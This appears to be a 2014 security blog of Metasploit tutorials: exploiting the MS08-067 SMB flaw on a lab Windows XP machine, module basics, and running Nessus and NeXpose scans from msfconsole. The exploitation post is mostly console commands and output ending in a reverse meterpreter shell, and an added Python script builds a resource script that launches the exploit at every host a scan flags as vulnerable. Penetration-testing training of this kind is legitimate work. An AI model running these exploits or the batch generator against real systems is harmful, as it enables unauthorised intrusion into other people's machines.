Saturday, 29 March 2014

How to exploit a Windows machine!

After covering how to use msfconsole in my previous tutorial,
let's exploit our first machine.

I am using Metasploit from Kali Linux against a virtual Windows XP SP2
machine. We'll begin by confirming the vulnerability ourselves rather
than taking it on faith.

First, start msfconsole and run the following (msfconsole passes a
command it does not recognise, such as nmap, through to the shell; use
db_nmap instead if you want the results stored in the Metasploit
database):

msf > nmap -sT -A --script=smb-check-vulns -P0 192.168.1.2

Here we use nmap's scripting engine to discover open ports and get an
idea of how a particular service might be exploited. -sT is a full TCP
connect scan: it completes the three-way handshake, so it is not the
stealthy option (that is the SYN scan, -sS), but it is the most reliable
flag for enumerating ports, and it works without root. -A is the
aggressive scan: it turns on OS detection, service version detection,
default script scanning and traceroute, which gives us banner grabs and
fingerprints of each service. -P0 is the old spelling of -Pn: skip host
discovery and scan the target even if it does not answer pings. The
smb-check-vulns script reports whether the host looks vulnerable to
MS08-067. Note that this particular check is disabled by default because
it can crash the Server service on a vulnerable host; enable it with
--script-args=unsafe=1 only on a lab machine you are allowed to break.


From here on we'll assume the scan reported our target as vulnerable to
MS08-067 (CVE-2008-4250), a stack buffer overflow in the Server
service's path-canonicalisation code that is reachable over SMB without
authentication.

Let’s walk through the actual exploitation. First the setup:
msf > search ms08_067_netapi
[*] Searching loaded modules for pattern 'ms08_067_netapi'...
Exploits
========
Name Rank Description
---- ---- -----------
windows/smb/ms08_067_netapi great Microsoft Server Service Relative Path Stack
Corruption
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > show targets
Exploit targets:
Id Name
-- ----
0 Automatic Targeting
1 Windows 2000 Universal
2 Windows XP SP0/SP1 Universal
3 Windows XP SP2 English (NX)
4 Windows XP SP3 English (NX)
5 Windows 2003 SP0 Universal
6 Windows 2003 SP1 English (NO NX)
7 Windows 2003 SP1 English (NX)
8 Windows 2003 SP2 English (NO NX)
9 Windows 2003 SP2 English (NX)
. . . SNIP . . .
26 Windows XP SP2 Japanese (NX)
. . . SNIP . . .
msf exploit(ms08_067_netapi) > set TARGET 3
target => 3
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.2
RHOST => 192.168.1.2
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.3
LHOST => 192.168.1.3
msf exploit(ms08_067_netapi) > set LPORT 8080
LPORT => 8080
msf exploit(ms08_067_netapi) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.1.2 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process
LHOST 192.168.1.3 yes The local address
LPORT 8080 yes The local port
Exploit target:
Id Name
-- ----
3 Windows XP SP2 English (NX)


Having set the stage, we're ready to conduct the actual exploitation.
(If you are not sure of the target's service pack and language, leave
TARGET at 0, Automatic Targeting, which fingerprints the host first; a
wrong manual target can crash the Server service instead of returning a
shell.)

msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.1.3:8080
[*] Triggering the vulnerability...
[*] Sending stage (748032 bytes)
[*] Meterpreter session 1 opened (192.168.1.3:8080 -> 192.168.1.2:1487)
msf exploit(ms08_067_netapi) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter 192.168.1.3:8080 -> 192.168.1.2:1036
msf exploit(ms08_067_netapi) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > shell
Process 4060 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>



Congratulations! You’ve just compromised your first machine!
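Turning the scan result into the exploit run above can be scripted. The following is an added example, not code from the original post: it reads an nmap XML report (the same scan as above, saved with -oX and run with --script-args=unsafe=1 so the MS08-067 check actually executes), keeps the hosts the script reports as VULNERABLE, and writes a Metasploit resource script that repeats the use/set/exploit sequence for each of them. The file names, the sample XML embedded in the script and the choice of one LPORT per host are assumptions made here, not anything from the original post.

```python
#!/usr/bin/env python3
"""Turn an nmap XML report into a Metasploit resource script for the hosts
that smb-check-vulns flagged as MS08-067 VULNERABLE.

Added example; not code from the original post. It assumes the scan was
saved with -oX (nmap -sT -A --script=smb-check-vulns --script-args=unsafe=1
-Pn -oX scan.xml <targets>) and that the script's output attribute holds a
line such as "MS08-067: VULNERABLE", which is how the script reports it.
"""
import re
import sys
import xml.etree.ElementTree as ET

# Constructed sample of nmap -oX output for two hosts: one flagged
# vulnerable, one that the script reports as not vulnerable.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
  <host><status state="up"/>
    <address addr="192.168.1.2" addrtype="ipv4"/>
    <ports><port protocol="tcp" portid="445"><state state="open"/>
      <service name="microsoft-ds"/></port></ports>
    <hostscript><script id="smb-check-vulns"
      output="&#10;  MS08-067: VULNERABLE&#10;  Conficker: Likely CLEAN&#10;  SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE"/>
    </hostscript>
  </host>
  <host><status state="up"/>
    <address addr="192.168.1.5" addrtype="ipv4"/>
    <ports><port protocol="tcp" portid="445"><state state="open"/>
      <service name="microsoft-ds"/></port></ports>
    <hostscript><script id="smb-check-vulns"
      output="&#10;  MS08-067: NOT VULNERABLE&#10;  Conficker: Likely CLEAN"/>
    </hostscript>
  </host>
</nmaprun>
"""

# "MS08-067: NOT VULNERABLE" does not match: "NOT" sits between the colon
# and VULNERABLE, so only a positive verdict passes.
MS08_067_VULNERABLE = re.compile(r"MS08-067:\s*VULNERABLE\b")


def ms08_067_hosts(xml_text):
    """Return the IPv4 addresses of hosts that are up, have 445/tcp open and
    whose smb-check-vulns output reports MS08-067 as VULNERABLE."""
    hits = []
    for host in ET.fromstring(xml_text).iter("host"):
        status = host.find("status")
        addr = host.find("address[@addrtype='ipv4']")
        if status is None or status.get("state") != "up" or addr is None:
            continue
        smb_open = any(
            p.get("protocol") == "tcp" and p.get("portid") == "445"
            and p.find("state") is not None
            and p.find("state").get("state") == "open"
            for p in host.iter("port")
        )
        if not smb_open:
            continue
        for script in host.iter("script"):
            if (script.get("id") == "smb-check-vulns"
                    and MS08_067_VULNERABLE.search(script.get("output", ""))):
                hits.append(addr.get("addr"))
                break
    return hits


def build_resource_script(hosts, lhost, first_lport=8080):
    """Render an msfconsole resource script (run it with: msfconsole -r file.rc).
    Each host gets its own LPORT: a handler already bound to a port would make
    the next exploit fail to start its listener."""
    lines = ["# generated from nmap smb-check-vulns results"]
    for i, host in enumerate(hosts):
        lines += [
            "use exploit/windows/smb/ms08_067_netapi",
            "set PAYLOAD windows/meterpreter/reverse_tcp",
            "set TARGET 0",            # Automatic Targeting: fingerprint first
            f"set RHOST {host}",
            f"set LHOST {lhost}",
            f"set LPORT {first_lport + i}",
            "exploit -j -z",           # background job, do not auto-interact
        ]
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    if len(sys.argv) != 3:
        sys.exit("usage: nmap2rc.py scan.xml LHOST > ms08_067.rc")
    with open(sys.argv[1]) as fh:
        targets = ms08_067_hosts(fh.read())
    sys.stdout.write(build_resource_script(targets, sys.argv[2]))
```

Run it as nmap2rc.py scan.xml 192.168.1.3 > ms08_067.rc, then msfconsole -r ms08_067.rc; sessions -l shows whatever came back. The generated script uses TARGET 0 rather than a hand-picked target so the module fingerprints each host before sending the overflow, which is the safer choice when a resource script is firing at more than one machine.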


You can watch the video tutorial here.

Saturday, 22 March 2014

An introduction to Basic Exploitation !

After covering the intelligence-gathering and vulnerability-scanning
phases in my previous tutorials, we now turn to the basics of
exploitation. Exploits operate against the vulnerabilities you
discovered during those earlier phases of the penetration test.

Here we show how building on the Framework lets you concentrate on what
is unique about an exploit, while the Framework takes care of the rest:
the payload, encoding, NOP generation and so on.

The Metasploit Framework contains hundreds of modules, and it's nearly
impossible to remember them all. The show command lists the modules of
a given type:

msf > show exploits

This lists every exploit currently available in the Framework (show
auxiliary and show payloads do the same for the other module types).

msf > show options

When you run show options while a module is selected, Metasploit
displays only the options that apply to that particular module.

Now let's start with an example.

Open msfconsole (type msfconsole in a terminal). Once it has loaded,
search for modules by keyword. To find modules that target Microsoft SQL
Server, type:

msf > search mssql

Or, to find the MS08-067 exploit specifically:

msf > search ms08_067

Having found an exploit, load the module with the use command:

msf > use windows/smb/ms08_067_netapi

Now we can enter show options to display the options specific to the
MS08-067 exploit:

msf exploit(ms08_067_netapi) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) >


As you can see, this exploit requires the target's IP address.
Set RHOST to the target (here 192.168.1.1):

msf exploit(ms08_067_netapi) > set RHOST 192.168.1.1

Now run show options again:

msf exploit(ms08_067_netapi) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.1.1 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) >

As you can see, the target is now set.

show payloads

As with show options, running show payloads from a module-specific
prompt makes Metasploit display only the payloads compatible with that
module. From the top-level prompt it lists every payload in the
Framework:

msf > show payloads

Inside an exploit module you see only the payloads applicable to that
attack. For example, running show payloads from the
msf exploit(ms08_067_netapi) prompt gives the (abbreviated) output shown
next.

msf exploit(ms08_067_netapi) > show payloads
Compatible Payloads
===================
Name Rank Description
---- ---- -----------
. . . SNIP . . .
windows/shell/reverse_ipv6_tcp normal Windows Command Shell, Reverse TCP
Stager (IPv6)
windows/shell/reverse_nonx_tcp normal Windows Command Shell, Reverse TCP
Stager (No NX or Win7)
windows/shell/reverse_ord_tcp normal Windows Command Shell, Reverse
Ordinal TCP Stager (No NX or Win7)
windows/shell/reverse_tcp normal Windows Command Shell, Reverse TCP
Stager
windows/shell/reverse_tcp_allports normal Windows Command Shell, Reverse
All-Port TCP Stager
windows/shell_bind_tcp normal Windows Command Shell, Bind TCP
Inline
windows/shell_reverse_tcp normal Windows Command Shell, Reverse TCP
Inline

Wednesday, 12 March 2014

Scanning with Nessus from Within Metasploit !

First, drop the existing database with db_destroy and create a fresh
one with db_connect. Be aware that db_destroy deletes every host,
service and vulnerability you have collected so far, so only do this
when you want to start clean; otherwise db_connect alone is enough.

Load the Nessus plug-in by running load nessus, as shown here:


msf > db_destroy postgres:toor@127.0.0.1/msf3
[*] Warning: You will need to enter the password at the prompts below
Password:
msf > db_connect postgres:toor@127.0.0.1/msf3
msf > load nessus
[*] Nessus Bridge for Metasploit 1.1
[+] Type nessus_help for a command listing
[+] Exploit Index - (/root/.msf3/nessus_index) - is valid.
[*] Successfully loaded plugin: Nessus




Before starting a scan with the Bridge, authenticate to your Nessus
server with nessus_connect, as shown here (Nessus listens on port 8834
by default, and the trailing ok accepts its self-signed SSL certificate):

msf > nessus_connect Rohit:password@192.168.1.101:8834 ok
[*] Connecting to https://192.168.1.101:8834/ as Rohit
[*] Authenticated


A scan is launched against a defined policy, referenced by its policy
ID. To list the policies available on the server, use
nessus_policy_list:

msf > nessus_policy_list

Take note of the ID of the policy you want, then launch a new scan with
nessus_scan_new followed by the policy ID, a name for the scan, and the
target IP address, as shown next:


msf > nessus_scan_new
[*] Usage:
[*] nessus_scan_new <policy id> <scan name> <targets>

[*] use nessus_policy_list to list all available policies

msf > nessus_scan_new 2 bridge_scan 192.168.1.2



While the scan runs, nessus_scan_status shows its progress; when the
output says “No Scans Running”, the scan has completed.

After that, list the available reports with nessus_report_list and pull
one into the Metasploit database with nessus_report_get followed by its
report ID. The hosts, services and vulnerabilities from that report then
show up in db_hosts and db_vulns:

msf > nessus_report_list
msf > nessus_report_get <report id>

Tuesday, 11 March 2014

Vulnerability Scanning with Nessus !

Nessus is a well-known and popular vulnerability scanner, free for
personal, non-commercial use, first released in 1998 by Renaud Deraison
and currently published by Tenable Network Security.

Nessus Configuration :

After you have downloaded and installed Nessus, open your web browser
and navigate to https://<youripaddress>:8834

Creating a Nessus Scan Policy :

Before beginning a scan, you first need to create a Nessus scan policy.
On the Policies tab, click the green Add button to open the policy
configuration window.

Running a Nessus Scan :
After you have created a scan policy, you are ready to configure a scan.
Begin by selecting the Scans tab, and then click the Add button to
open the scan configuration window.


Nessus Reports :
After the scan is complete, it will no longer appear under Scans, and
you should find a new entry under the Reports tab listing the name of
the scan.

Importing Results into the Metasploit Framework :

Now let’s import our results into the Framework.
Click the Download Report button on the Reports tab to save the results
to your hard drive.

Load msfconsole, create a new database with db_connect, and import the
Nessus results file by entering db_import followed by the report
filename.

msf > db_connect postgres:toor@127.0.0.1/msf3
msf > db_import /tmp/nessus_report_Host_195.nessus
[*] Importing 'Nessus XML (v2)' data
[*] Importing host 192.168.1.195

For a complete listing of the vulnerability data imported into
Metasploit, run db_vulns without any switches.
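What db_import (and nessus_report_get in the Nessus Bridge post above) actually reads is the Nessus v2 XML inside the .nessus file. The following is an added example, not code from the original post or from Tenable: it parses such a report, counts services and non-informational findings per host the way db_hosts shows them, and picks out the findings for which Nessus records a matching Metasploit module, which is the shortlist you would carry into exploitation. The tag names follow the .nessus v2 layout (ReportHost/ReportItem with cve and metasploit_name children); the sample report embedded in the script is constructed, and the severity labels follow Nessus's 0 to 4 scale.

```python
#!/usr/bin/env python3
"""Summarise a Nessus v2 (.nessus) report the way db_hosts and db_vulns show
it after db_import, and pull out the findings for which Nessus itself
records a Metasploit module.

Added example; not code from the original post or from Tenable. It assumes
the Nessus v2 layout: Report/ReportHost/ReportItem, with the plugin and
severity in ReportItem attributes and cve / metasploit_name as children.
The sample report below is constructed for this example.
"""
import sys
import xml.etree.ElementTree as ET

SAMPLE_NESSUS = """<?xml version="1.0"?>
<NessusClientData_v2>
 <Report name="Host_195">
  <ReportHost name="192.168.1.195">
   <HostProperties>
    <tag name="host-ip">192.168.1.195</tag>
    <tag name="operating-system">Microsoft Windows XP Service Pack 2</tag>
   </HostProperties>
   <ReportItem port="445" svc_name="cifs" protocol="tcp" severity="4"
      pluginID="34477" pluginName="MS08-067: Microsoft Windows Server Service Crafted RPC Request Handling Remote Code Execution (958644) (uncredentialed check)">
    <cve>CVE-2008-4250</cve>
    <exploit_available>true</exploit_available>
    <exploit_framework_metasploit>true</exploit_framework_metasploit>
    <metasploit_name>Microsoft Server Service Relative Path Stack Corruption</metasploit_name>
   </ReportItem>
   <ReportItem port="445" svc_name="cifs" protocol="tcp" severity="2"
      pluginID="57608" pluginName="SMB Signing Disabled"/>
   <ReportItem port="445" svc_name="cifs" protocol="tcp" severity="0"
      pluginID="11011" pluginName="Microsoft Windows SMB Service Detection"/>
   <ReportItem port="135" svc_name="epmap" protocol="tcp" severity="0"
      pluginID="10736" pluginName="DCE Services Enumeration"/>
  </ReportHost>
 </Report>
</NessusClientData_v2>
"""

# Nessus severity attribute: 0 Info, 1 Low, 2 Medium, 3 High, 4 Critical
SEVERITY = {"0": "Info", "1": "Low", "2": "Medium", "3": "High", "4": "Critical"}
RANK = {name: int(code) for code, name in SEVERITY.items()}


def parse_nessus(xml_text):
    """One dict per ReportItem: host, service, plugin, severity label, CVEs
    and the Metasploit module name if Nessus recorded one (else None)."""
    findings = []
    for host in ET.fromstring(xml_text).iter("ReportHost"):
        for item in host.iter("ReportItem"):
            findings.append({
                "host": host.get("name"),
                "port": int(item.get("port", "0")),
                "proto": item.get("protocol", ""),
                "plugin_id": item.get("pluginID"),
                "name": item.get("pluginName", ""),
                "severity": SEVERITY.get(item.get("severity"), "Unknown"),
                "cves": [c.text.strip() for c in item.findall("cve") if c.text],
                "msf_module": item.findtext("metasploit_name"),
            })
    return findings


def host_summary(findings):
    """Per host: distinct services and findings above Info, mirroring the
    Svcs and Vulns columns of db_hosts."""
    summary = {}
    for f in findings:
        entry = summary.setdefault(f["host"], {"services": set(), "vulns": 0})
        if f["port"]:
            entry["services"].add((f["proto"], f["port"]))
        if RANK.get(f["severity"], -1) > RANK["Info"]:
            entry["vulns"] += 1
    return {h: {"svcs": len(e["services"]), "vulns": e["vulns"]}
            for h, e in summary.items()}


def exploitable(findings, min_severity="High"):
    """Findings at or above min_severity that Nessus ties to a Metasploit module."""
    threshold = RANK[min_severity]
    return [f for f in findings
            if f["msf_module"] and RANK.get(f["severity"], -1) >= threshold]


if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_NESSUS
    found = parse_nessus(text)
    for host, counts in host_summary(found).items():
        print(f"{host}: {counts['svcs']} services, {counts['vulns']} vulns")
    for f in exploitable(found):
        print(f"  {f['host']}:{f['port']}/{f['proto']} {f['severity']:8} "
              f"{f['plugin_id']} {','.join(f['cves'])} -> {f['msf_module']}")
```

Run it with the path to a downloaded .nessus file, or with no argument to see the constructed sample; the metasploit_name it prints is the module description you would then search for in msfconsole (search ms08_067 in the example above).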

Tuesday, 4 March 2014

How to run NeXpose within MSFconsole !

Running NeXpose from the web GUI is great for fine-tuning vulnerability
scans and generating reports.

But if you prefer to remain in msfconsole, you can still run full
vulnerability scans with the NeXpose plug-in included in Metasploit.

First, delete any existing database with db_destroy (this discards
everything collected so far; skip it if you want to keep earlier
results), create a new database with db_connect, and then load the
NeXpose plug-in with load nexpose:




msf > db_destroy postgres:toor@127.0.0.1/msf3
[*] Warning: You will need to enter the password at the prompts below
Password:
msf > db_connect postgres:toor@127.0.0.1/msf3
msf > load nexpose
[*] NeXpose integration has been activated
[*] Successfully loaded plugin: nexpose




Before running your first scan from msfconsole, you will need to
connect to your NeXpose installation. Enter nexpose_connect -h to
display the usage required to connect; add your username, password, and
host address; and accept the SSL certificate warning by adding ok to
the end of the connect string:



msf > nexpose_connect -h
[*] Usage:
[*] nexpose_connect username:password@host[:port] <ssl-confirm>
[*] -OR-
[*] nexpose_connect username password host port <ssl-confirm>
msf > nexpose_connect user:password@192.168.1.2 ok
[*] Connecting to NeXpose instance at 192.168.1.2:3780 with username user...





Now enter nexpose_scan followed by the target IP address to initiate a
scan:



msf > nexpose_scan 192.168.1.2
[*] Scanning 1 addresses with template pentest-audit in sets of 32
[*] Completed the scan of 1 addresses
msf >



After the NeXpose scan completes, the database you created earlier holds
the results of the vulnerability scan. To view them, enter db_hosts:

msf > db_hosts -c address
Hosts
=====
address      Svcs  Vulns  Workspace
-------      ----  -----  ---------
192.168.1.2  5     8      default
msf >

As you can see, NeXpose found five services and eight vulnerabilities on
the host. Run db_vulns to list them:

msf > db_vulns

Saturday, 1 March 2014

Vulnerability Scanning with NeXpose !

 NeXpose is Rapid7’s vulnerability scanner that scans networks to
identify the devices running on them and performs checks to identify
security weaknesses in operating systems and applications.

We will first perform a basic overt scan of our
target and import the vulnerability scan results into Metasploit. We
will close out this section by showing you how to run a NeXpose
vulnerability scan directly from msfconsole rather than using the
web-based GUI.

Configuration:

After installing NeXpose Community, open a web browser and navigate to

https://<youripaddress>:3780

On the NeXpose main page, you will notice a number of tabs at the top
of the interface like Assets tab,Reports tab,Vulnerabilities tab,
Administration tab.

The New Site Wizard :
Before running a vulnerability scan with NeXpose, you need to configure
a site, that is, a named set of targets. The site is then scanned by
NeXpose, and different scan types can be defined for it.

To create a site, click the New Site button on the NeXpose home page,
enter a name for your site and a brief description, and then
click Next.

In the devices step, you have quite a bit of granularity
in defining your targets. You can add a single IP address, address
ranges, hostnames, and more. Click Next when you have finished adding
and excluding devices.

At the scan setup step, choose one of the scan templates, such as
Discovery Scan or Penetration test, and select the scan engine you want
to use. Click Next to continue.

Add credentials for the site you want to scan, if you have them; a
credentialed scan finds far more (missing patches, local configuration)
than an unauthenticated one. On the Credentials tab, click the New Login
button, type a username and password for the IP address you want to
scan, click Test Login to verify the credentials, and then save them.

The New Report Wizard :

Click New Report, Enter a friendly name, and then in the Report format
field, select NeXpose Simple XML Export so that you will be able to
import the scan results into Metasploit.

Click Next when you are ready to proceed.
In the subsequent window, add the devices you want to be included in
the report by clicking Select Sites to add your scanned target range,
Then click Save.
In the Select Devices dialog, select the targets to include in your
report and then click Save.
Back in the Report Configuration wizard, click Save to accept the
remaining defaults for the report.

Importing Your Report into the Metasploit Framework:

Having completed a full vulnerability scan with NeXpose, you need to
import the results into Metasploit. Before you do, connect msfconsole to
a database with db_connect (the database is created if it does not yet
exist). Then import the NeXpose XML with the db_import command.

--------------------
msf > db_connect postgres:toor@127.0.0.1/msf3
msf > db_import /tmp/report.xml
[*] Importing 'NeXpose Simple XML' data
[*] Importing host 192.168.1.195
[*] Successfully imported /tmp/report.xml
msf > db_hosts -c address,svcs,vulns

---------------------------